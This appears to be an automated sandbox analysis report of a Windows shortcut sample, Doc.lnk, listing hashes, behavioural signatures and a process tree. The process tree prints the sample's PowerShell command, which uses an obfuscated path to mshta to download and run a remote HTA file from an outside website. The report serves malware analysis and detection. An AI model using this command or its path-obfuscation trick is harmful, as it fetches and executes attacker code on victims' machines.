Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
22/05/2024, 05:20
Static task
static1
Behavioral task
behavioral1
Sample
Doc.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Doc.lnk
Resource
win10v2004-20240426-en
13 signatures
150 seconds
General
-
Target
Doc.lnk
-
Size
1KB
-
MD5
60f1320faf25bc20101c4312f82a72f8
-
SHA1
a37a8f932db503eed34cbe9aa1db40f63b36fee1
-
SHA256
bb26c65d29da78c698c19344058832b21593d27f4d89b5118345bb76614a564a
-
SHA512
96652e9e0a96545449a260c19d920eb3f1debc879e76f5a594848a28ef165b733ca61fcc75636781289e30cc7e87aae11028ff159a1bdc93a274dbed99f03d07
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2008 wrote to memory of 2588 2008 cmd.exe 29 PID 2008 wrote to memory of 2588 2008 cmd.exe 29 PID 2008 wrote to memory of 2588 2008 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Doc.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://foundationforwomenshealth.com/rooming.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-